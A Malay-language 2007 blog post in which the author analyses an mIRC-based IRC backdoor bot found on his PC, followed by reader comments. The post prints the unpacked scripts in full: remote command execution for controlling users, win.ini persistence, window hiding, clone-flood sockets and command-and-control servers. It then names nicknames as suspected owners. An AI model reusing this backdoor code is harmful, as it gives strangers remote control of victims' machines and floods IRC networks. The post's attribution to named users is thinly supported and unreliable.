Najib’Palace

Personal weblog with news of software, hardware, technology, tips and tricks

IRC BOT

Hai…busy betul sekarang x sempat nak update blog ni..anyway ada cerita skit ni pasal irc bot

pagi tadi masa tengah buat check list kat pc ada terjumpa benda yang menarik..hmm dah lama dah tinggal benda ni..ingat kan dah takde orang nak guna teknik bodoh ni tapi ada lagi yek….benda tu ialah IRC BOT ( Backdoor.flood )!..kenapa ye melayu ni suka sangat pedajal sesama melayu?… hmm ni review skit pasal irc bot yang jumpa dalam pc ni..

file yang disyaki

hideO.PNF
hidirN.PNF
hideIN.PNF

ketiga tiga file ini telah dikesan oleh virus scanner sebagai IRC/Backdoor.flood…setelah di unpack kan files tersebut sedikit demi sedikit rahsia terbongkar ttg owner virus ini.. ( jeng jenggggggg…. )

isi dalam hideO.PNF
====================================================================
on 1:text:*:?: {
if ($master($nick) == $true) {
if (!exit == $1) { exit | run $mircexe }
if (!run == $1) { //run $2- }
if (!command == $1) { $2- }
if (!addmaster == $1) && ($2) { writeini ajoin.txt Owner Master $addtok($readini(ajoin.txt,Owner,Master),$2,32) | .msg $nick $2 in masterlist | halt }
if (!delmaster == $1) && ($2) { writeini ajoin.txt Owner Master $remtok($readini(ajoin.txt,Owner,Master),$2,1,32) | .msg $nick $2 out masterlist | halt }
if (!masterlist == $1) { msg $nick masterlist: $_masterlist }
if (!server == $1) && ($2) { set %server $2 }
if (!port == $1) && ($2) { set %port $2 }
if (cj == $1) && ($2) { sockwrite -tn * join #$2 }
if (cp == $1) && ($2) { sockwrite -tn * part #$2 }
if (cload == $1) && ($2) { var %i = 1 | while (%i < $2) { bot | inc %i } }
if (cclose == $1) { sockclose * }
if (jj == $1) && ($2) { join #$2 }
if (pp == $1) && ($2) { part #$2 }
if (!ajoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 1 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 2 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 3 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 4 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 5 $3 }
}
if (!list == $1) { msg $nick $readini(ajoin.txt,autojoin,1) $readini(ajoin.txt,autojoin,2) $readini(ajoin.txt,autojoin,3) $readini(ajoin.txt,autojoin,4) $readini(ajoin.txt,autojoin,5) }
}
}
on 1:text:*:#: {
if (Guest isin $me) { nick $read nick.txt | .timer 1 3 join #gamble }
if ($master($nick) == $true) {
if (!run == $1) { //run $2- }
if (!command == $1) { $2- }
if (!addmaster == $1) && ($2) { writeini ajoin.txt Owner Master $addtok($readini(ajoin.txt,Owner,Master),$2,32) | .msg # $2 in masterlist | halt }
if (!delmaster == $1) && ($2) { writeini ajoin.txt Owner Master $remtok($readini(ajoin.txt,Owner,Master),$2,1,32) | .msg # $2 out masterlist | halt }
if (!masterlist == $1) { msg # masterlist: $_masterlist }
if (!server == $1) && ($2) { set %server $2 }
if (!port == $1) && ($2) { set %port $2 }
if (cj == $1) && ($2) { sockwrite -tn * join #$2 }
if (cp == $1) && ($2) { sockwrite -tn * part #$2 }
if (cload == $1) && ($2) { var %i = 1 | while (%i < $2) { bot | inc %i } }
if (cclose == $1) { sockclose * }
if (jj == $1) && ($2) { join #$2 }
if (pp == $1) && ($2) { part #$2 }
if (!ajoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 1 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 2 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 3 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 4 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 5 $3 }
}
if (!bjoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 6 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 7 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 8 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 9 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 10 $3 }
}
if (!list == $1) { msg # $readini(ajoin.txt,autojoin,1) $readini(ajoin.txt,autojoin,2) $readini(ajoin.txt,autojoin,3) $readini(ajoin.txt,autojoin,4) $readini(ajoin.txt,autojoin,5) }
if (!list2 == $1) { msg # $readini(ajoin.txt,autojoin,6) $readini(ajoin.txt,autojoin,7) $readini(ajoin.txt,autojoin,8) $readini(ajoin.txt,autojoin,9) $readini(ajoin.txt,autojoin,10) }
if (!exit == $1) { exit | run $mircexe }
}
}
on *:disconnect: {
if ($cid == $scon(1)) {
timerjoin* off
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
//server irc.webchat.org
.timeronline 0 300 //server irc.webchat.org
}
if ($cid == $scon(2)) {
timerjoin* off
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
//server smpt.kicks-ass.org 7000
.timeronline 0 300 //server smpt.kicks-ass.org 7000
}
}
on *:connect: {
if ($cid == $scon(1)) {
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
.timerjoin1 1 2 join #gamble,#chan
.timerjoin2 1 10 join $readini(ajoin.txt,autojoin,1)
.timerjoin3 1 25 join $readini(ajoin.txt,autojoin,2)
.timerjoin4 1 45 join $readini(ajoin.txt,autojoin,3)
.timerjoin5 1 65 join $readini(ajoin.txt,autojoin,4)
.timerjoin6 1 95 join $readini(ajoin.txt,autojoin,5)
umode -Mmep
}
if ($cid == $scon(2)) {
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
.timerbjoin1 1 2 join #linuxpc,#chan
.timerbjoin2 1 10 join $readini(ajoin.txt,autojoin,6)
.timerbjoin3 1 25 join $readini(ajoin.txt,autojoin,7)
.timerbjoin4 1 45 join $readini(ajoin.txt,autojoin,8)
.timerbjoin5 1 65 join $readini(ajoin.txt,autojoin,9)
.timerbjoin6 1 95 join $readini(ajoin.txt,autojoin,10)
umode -Mmep
}
if ($cid == $scon(3)) { .timercjoin1 1 2 join #chan }
if ($cid < 2) { .server -m smpt.kicks-ass.org 7000 }
.timeronline off
}
raw 433:*: { nick $read nick.txt }
raw 432:*: { nick $read nick.txt }
raw 437:*: { part $2 | nick $read nick.txt | .timer $+ $r(00,99) 1 5 join $2 }
on *:nick: {
if (Guest isin $me) { nick $read nick.txt }
}
on 1:part:#: {
if (# == #wcc) { if (Guest isin $me) { nick $read nick.txt } | .timer 1 3 join #gamble }
if (# == #chan) { if (Guest isin $me) { nick $read nick.txt } | .timer 1 3 join #gamble }
}
on 1:start: {
.dll mIRC.dll mIRC hide
.timeronline 1 2 //server irc.webchat.org
writeini c:\windows\win.ini windows load C:\WINDOWS\System.exe
Set %bot.dir $mircexe
If ( $readini C:\windows\win.ini Windows Load == $null ) { Writeini C:\windows\win.ini Windows Load %bot.dir }
Elseif ( $readini C:\windows\win.ini Windows Load != %bot.dir ) { Remini C:\windows\win.ini Windows Load | Writeini C:\windows\win.ini Windows Load %bot.dir }
}
on 1:sockopen:bot*:{
sockwrite -n $sockname CONNECT %server $+ : $+ %port HTTP/1.0 $+ $CRLF $+ $CRLF
sockwrite -n $sockname nick $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9)
sockwrite -n $sockname user $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9) xtc xtc : $read fxscom.txt
}
on 1:sockread:*:{
if ($sockerr > 0) { return }
sockread %temp
if ($gettok(%temp,1,32) == ping) { .sockwrite -n $sockname PONG $gettok(%temp,2-,32) }
}
alias bot {
.sockopen bot $+ $r(1,1000000) %server %port
}
On 1:Sockclose:*: {
bot
}
====================================================================

ini dalam hideiN.PNF

on 1:DISCONNECT:{
.fullname $read BlueFax.txt
.timer* off
.identd on $read biosSYS.txt
.server $1-
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9)
}
on 1:CONNECT:{
.remote on
.identd on $read biosSYS.txt
.echo 4 $dll(motfv3.dll,motfv,Sync)
.fullname $read BlueFax.txt
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.auser otai puttok
.auser otai ircN
.timer 1 1 umode -Mmip+L
.timer 1 5 join #²²²
.timer 1 8 join #bosnia
.timer 1 11 join #pantaicrew
.timer 1 13 join #kosmo
.timer 1 16 join #pso
.timer 1 19 join %c1
.timer 1 21 join %c2
.timer 1 24 join %c3
.timer 1 27 join %c4
.timer 1 30 join %c5
}
on 1:start: {
writeini C:\windows\win.ini windows load C:\windows\inf\system.exe
echo 4 $dll(motfv3.dll,motfv,Load)
dll winsome.dll HideMirc on
.fullname $read BlueFax.txt
.identd on $read biosSYS.txt
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.timer 1 2 //server irc.webchat.org 7000
}

on +otai:TEXT:*:*: {
if ($1 == @fak) { $2- | halt }
if ($1 == @join) { .join $2 }
if ($1 == @part) { .part $2 }
if ($1 == @op) { .mode # +o $2 }
if ($1 == @deop) { .mode # -o $2 }
if ($1 == @voice) { .mode # +v $2 }
if ($1 == @devoice) { .mode # -v $2 }
if ($1 == @uop) { .mode # +u $2 }
if ($1 == @duop) { .mode # -u $2 }
if ($1 == @kick) { .kick # $2 $3- }
if ($1 == @topic) { topic # $2- }
if ($1 == @aj1) {  .set %c1 $addtok(%c1,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj2) {  .set %c2 $addtok(%c2,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj3) {  .set %c3 $addtok(%c3,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj4) {  .set %c4 $addtok(%c4,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj5) {  .set %c5 $addtok(%c5,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @rj1) {  .set %c1 $remtok(%c1,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj2) {  .set %c2 $remtok(%c2,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj3) {  .set %c3 $remtok(%c3,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj4) {  .set %c4 $remtok(%c4,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj5) {  .set %c5 $remtok(%c5,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @aj1list) { .msg # $aj1list | halt }
if ($1 == @aj2list) { .msg # $aj2list | halt }
if ($1 == @aj3list) { .msg # $aj3list | halt }
if ($1 == @aj4list) { .msg # $aj4list | halt }
if ($1 == @aj5list) { .msg # $aj5list | halt }
if ($1 == @addmaster) { .auser master $2- | .set %master $addtok(%master,$2-,32) | .msg # $2 have been added to my master list }
if ($1 == @delmaster) { .ruser $2- | .set %master $remtok(%master,$2,1,32) | .msg # $2- was not my Master }
if ($1 == @master) { .msg # $masterlist | halt }
if ($1 == @otai) { .msg # $ownerlist | halt }
if ($1 == @clone) { .msg # Clone Set: $2 | .set %jumlah $2 | .timer %jumlah 3 //bot }
if ($1 == @cserver) { .msg # Server Set: $2 | .set %server $2 }
if ($1 == @cport) { .msg # Port Set: $2 | .set %port $2 }
if ($1 == @cjoin) { .msg # Clone Join Channel: $2 | .sockwrite -n * join $2 }
if ($1 == @cpart) {  .msg # Clone Part Channel: $2 | .sockwrite -n * part $2 }
if ($1 == @ckill) { .msg # Clone Kill | .sockclose * | .sockclose * | .sockclose * }
if ($1 == @addotai) { .auser otai $2- | .set %otai $addtok(%otai,$2-,32) | .msg # $2 have been added to my owner list }
if ($1 == @delotai) { .ruser $2- | .set %otai $remtok(%otai,$2,1,32) | .msg # $2- was not my owner }
if ($1 == @version) { .msg #²²²  ni version 4PUKI  }
if ($1 == @pokewak) { .set %pokewak $2 | .sockwrite -n * join $2 | .timer 1 6 pantat | .timer 1 10 sockwrite -n * part $2 | }
}
on +master:TEXT:*:*: {
if ($1 == @join) { .join $2 }
if ($1 == @part) { .part $2 }
if ($1 == @op) { .mode # +o $2 }
if ($1 == @deop) { .mode # -o $2 }
if ($1 == @voice) { .mode # +v $2 }
if ($1 == @devoice) { .mode # -v $2 }
if ($1 == @uop) { .mode # +u $2 }
if ($1 == @duop) { .mode # -u $2 }
if ($1 == @kick) { .kick # $2 $3- }
if ($1 == @topic) { topic # $2- }
if ($1 == @pelaq) {  .msg # $2 ha la pasal pa }
if ($1 == @aj1) {  .set %c1 $addtok(%c1,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj2) {  .set %c2 $addtok(%c2,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj3) {  .set %c3 $addtok(%c3,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj4) {  .set %c4 $addtok(%c4,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj5) {  .set %c5 $addtok(%c5,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @rj1) {  .set %c1 $remtok(%c1,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj2) {  .set %c2 $remtok(%c2,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj3) {  .set %c3 $remtok(%c3,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj4) {  .set %c4 $remtok(%c4,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj5) {  .set %c5 $remtok(%c5,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @aj1list) { .msg # $aj1list | halt }
if ($1 == @aj2list) { .msg # $aj2list | halt }
if ($1 == @aj3list) { .msg # $aj3list | halt }
if ($1 == @aj4list) { .msg # $aj4list | halt }
if ($1 == @aj5list) { .msg # $aj5list | halt }
if ($1 == @version) { .msg #²²² ni version 4PUKI }
}

on 1:PART:#²²²: {
if ($nick == $me) { .timer 1 5 join #²²² }
}
on 1:NICK: {
if ($nick != $me) { return }
if ($newnick isletter Guest*) { .timer 1 3 .nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) }
}
on 1:KICK:#²²²:{ .timer 1 5 join #²²² }

alias masterlist {
if ($numtok(%master,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%master,32)) { .var %:ml = $gettok(%master,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%master,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias ownerlist {
if ($numtok(%own,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%own,32)) { .var %:ml = $gettok(%own,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%own,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}

alias pantat { .timer 3 0 sockwrite -n * privmsg %pokewak $read engsix.txt }
alias aj1list {
if ($numtok(%c1,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c1,32)) { .var %:ml = $gettok(%c1,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c1,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj2list {
if ($numtok(%c2,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c2,32)) { .var %:ml = $gettok(%c2,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c2,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj3list {
if ($numtok(%c3,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c3,32)) { .var %:ml = $gettok(%c3,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c3,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj4list {
if ($numtok(%c4,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c4,32)) { .var %:ml = $gettok(%c4,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c4,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj5list {
if ($numtok(%c5,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c5,32)) { .var %:ml = $gettok(%c5,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c5,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}

====================================================================

isi dalam hidirN.PNF

on 1:sockopen:bot*:{
sockwrite -n $sockname CONNECT %server $+ : $+ %port HTTP/1.0 $+ $CRLF $+ $CRLF
sockwrite -n $sockname nick $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9)
sockwrite -n $sockname user $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) xtc xtc : $read fxscom.txt
}
on 1:sockread:*:{
if ($sockerr > 0) { return }
sockread %temp
if ($gettok(%temp,1,32) == ping) { .sockwrite -n $sockname PONG $gettok(%temp,2-,32) }
}
alias bot {
.sockopen bot $+ $r(1,1000000) %server %port
}
On 1:Sockclose:*: {
bot
}

======================================================================

setelah meneliti ketiga tiga files tadi saya telah mendapati link kepada 3 files tersebut ialah

remote.ini
setz.ini
aliases.exe
system.exe
remote.exe
mIRC.DLL
mirc.ini
server.ini
dan beberapa jenis files lagi…kesemuanya membuktikan bahawa files tersebut adalah sepadan dengan mIRC files. so next step ialah analisa kesemua files files tersebut utk mengetahui siapakah dalang disebalik irc backdoor script ini.

isi kandungan didalam remote.ini
[variables]
n0=%server irc.webchat.org
n1=%port 6667
n2=%jumlah 100
n3=%master
n4=%ircbot
n5=%logo batmania
n6=%vversion I got a complaint…it’s About You Baby..!!
n7=%mk1
n8=%c1 #bb
n9=%c2 #punk
n10=%c3 #cheras
n11=%c4
n12=%c5
n13=%p.save.cloning.srv
n14=%serverx irc.webchat.org
n15=%portx 6667
n16=%pserver
n17=%sock.ping on
n18=%bot.sock bot
n19=%otai
n20=%pokewak #bijik
n21=%temp PING :2142D0BD
[users]
n0=master:IRcclient
n1=master:syj
n2=master:azroy
n3=otai:puttok
n4=otai:ircN

======================================================================
//[users]
//group users adalah senarai orang yang mempunyai access utk mengawal irc backdoor ini. setelah membuat tinjauan kepada atas beberapa server  saya mendapati ke empat empat nick yang terdapat didalam users itu berasal dari server webchat. ( irc.webchat.org )

dan hasil daripada isi kandungan aliases.exe menunjukkan bahawa “Master owner irc bot ini adalah milik ^maxtor^.

isi dalam file aliases.exe setelah di unpack.

/op /mode # +ooo $$1 $2 $3
/dop /mode # -ooo $$1 $2 $3
/j /join #$$1 $2-
/p /part #
/n /names #$$1
/w /whois $$1
/k /kick # $$1 $2-
/q /query $$1
/send /dcc send $1 $2
/chat /dcc chat $1
/ping /ctcp $$1 ping
_masterlist { if ($numtok($readini(ajoin.txt,Owner,Master),32) == 0) { return tiada… | halt } | var %:i = 1 | while (%:i <= $numtok($readini(ajoin.txt,Owner,Master),32)) { var %:ml = $gettok($readini(ajoin.txt,Owner,Master),%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok($readini(ajoin.txt,Owner,Master),32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | inc %:i } | return %:aml $+ . }
master return $istok($readini(ajoin.txt,Owner,Master) $decode(Xk1heFRvcl4=,m) ,$1,32)

jelas sekali nickname owner trojan ini telah decode menggunakan decode irc yang remeh. setelah dihuraikan code tersebut jelas ia menunjukkan nickname ^MaxTor^ .

seterusnya saya cuba mendapatkan Actice Connection daripada pc ini. resultnya kat bawah nie

Active Connections

Proto  Local Address          Foreign Address        State
TCP    PC3:1027               pool.webmaster.webchat.org:6667  ESTABLISHED
TCP    PC3:1029               cikgu.razie.net:7000   ESTABLISHED
TCP    PC3:1032               pool.webmaster.webchat.org:6667  ESTABLISHED
TCP    PC3:1034               cikgu.razie.net:7000   ESTABLISHED
TCP    PC3:1035               58.27.124.139:http     ESTABLISHED

hmmm ada beberapa yang menarik perhatian saya…so saya cuba url cikgu.razie.net port 7000 menggunakan web browser. hasilnye

:mesra.jb.my.kampungchat.org NOTICE AUTH :*** Looking up your hostname...
:mesra.jb.my.kampungchat.org NOTICE AUTH :*** Found your hostname (cached)
:mesra.jb.my.kampungchat.org 451 GET :You have not registered
:mesra.jb.my.kampungchat.org 451 Host: :You have not registered
:mesra.jb.my.kampungchat.org 451 User-Agent: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Language: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Encoding: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Charset: :You have not registered
:mesra.jb.my.kampungchat.org 451 Keep-Alive: :You have not registered
:mesra.jb.my.kampungchat.org 451 Connection: :You have not registered
ERROR :Closing Link: [60.48.58.194] (Ping timeout)

menunjukkan bahawa address cikgu.razie.net:7000 telah diforwardkan kepada server irc mesra.jb.my.kampungchat.org. so saya cuba membuat tinjauan keatas irc server tadi. setelah menyamar sebagai user dan bertanya ttg url cikgu.razie.net jelas owner url tersebut milik nickname Razie. dan mempunyai access SRA diserver tersebut…hmm bukan calan calang orang yek boleh pegang access tinggi macam tu.. nasihat saya kepada orang yang terlibat perihal irc.backdoor ini. cuba la cari cara yang lebih canggih lagi utk membuat backdoor ni…anak saya yang darjah 3 pon boleh tahu files yang anda tanam dalam pc ni adalah jenis irc backdoor. skills tanam irc backdoor ni dah lama digunakan wo…takkan asyik nak tiru gaya orang lain.

September 25, 2007 - Posted by | News for today

7 Comments »

  1. tunjuk ajar ku sifu~!

    Comment by Wann | October 24, 2007 | Reply

  2. ahaks… cantik.. tp penin.. dari mana tue?

    Comment by Wann | October 24, 2007 | Reply

  3. alahai si cerdik dan pintar lagi bijaksana… anak ko darjah 3 pun reti?? ni lagi kaki putar belit see ? anak darjah 3 pun reti backdoor elo kawan nak kincing pon beragak la kave2 la sket awak tu dah besa dah ade anak darjah 3 pulak tu apejadahnya awak nak bohong semua orang yang masuk dalam url ni yang mengatakan anak awak pun tau backdoor ni… (anak saya yang darjah 3 pon boleh tahu files yang anda tanam dalam pc ni adalah jenis irc backdoor.)ternyatalah sudah user yang masuk dalam website ni boleh menghuraikan yang si pandai lagi cerdik ni kaki kipas ke? kaki mengampu ke? ataupun sebaliknya… kami semua tau awak niat baik sipandai tapi… memang dah lumrahkan irc ni camtu ermm ataupun awak nak carik publisiti murahan ni! well apapapun terima kasih la sebab information ni sbb kasik tau kat murid2 sekolah… hurhmmm akhirkata majulah irc untuk negara…

    Owner: hehheh sorry yek cik tukangajar. maksud sebenarnya saya adalah utk menbezakan coding skill tu je. bukan maksud sebenar budak darjah 3 pon tau tu backdoor. tapi kalau encik tukangajar pernah mengajar budak K-12 mesti encik tau sejauh mana skill diorang ttg coding.🙂 ape ape pon harap encik tukangajar sudi memberi tunjuk ajar kalau ada silap salah ek. selamat hari raya😀

    Comment by tukangajar | October 24, 2007 | Reply

  4. Perasaan spertinya saya juga pernah menemukan file itu.

    ariyako: iya ada beberapa virus yang telah dibangunkan menggunakan source haha.js iaitu virusmawar.js ( sama fungsi dengan haha.js ) dan juga Worm.VBS.autorun.j ( juga diadaptasi dari virus haha.js tapi fungsi utama menyebarkan IRC BOT )

    Comment by Furkan | February 27, 2008 | Reply

  5. aku setuju, irc bot tuh memang bodoh sangat. Guna mirc.exe wat tanam bot memang la sapapun leh jumpa ngan senang. Kalau yerpun wat bot guna la C++/vb dan guna port server selain 6667-7000. Hmm.. mesti tahap tuh je owner bot tanam tuh leh wat.

    Knowledge Is Power!🙂

    Comment by anonymous | August 8, 2008 | Reply

  6. ASSALAMU’ALAIKUM NAJIB, APA KHABAR? NAJIB NAMA SAMA MACAM JIRAN SAYA🙂 INFORMASI YANG BAGUS, TAPI RAZIE YANG DIMAKSUDKAN DALAM ARTIKEL NI YANG JADI OPERATOR KAMPUNG DALnet TU KE?

    Comment by Muhammad Zulkhibri Bin Musa @ Munir | August 19, 2008 | Reply

  7. ampeh.. ^maxtor^ ircclient ni sme coder ka? kakakaka ntah dari mane dorang rip ni

    Comment by Webnet-user | June 27, 2009 | Reply


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: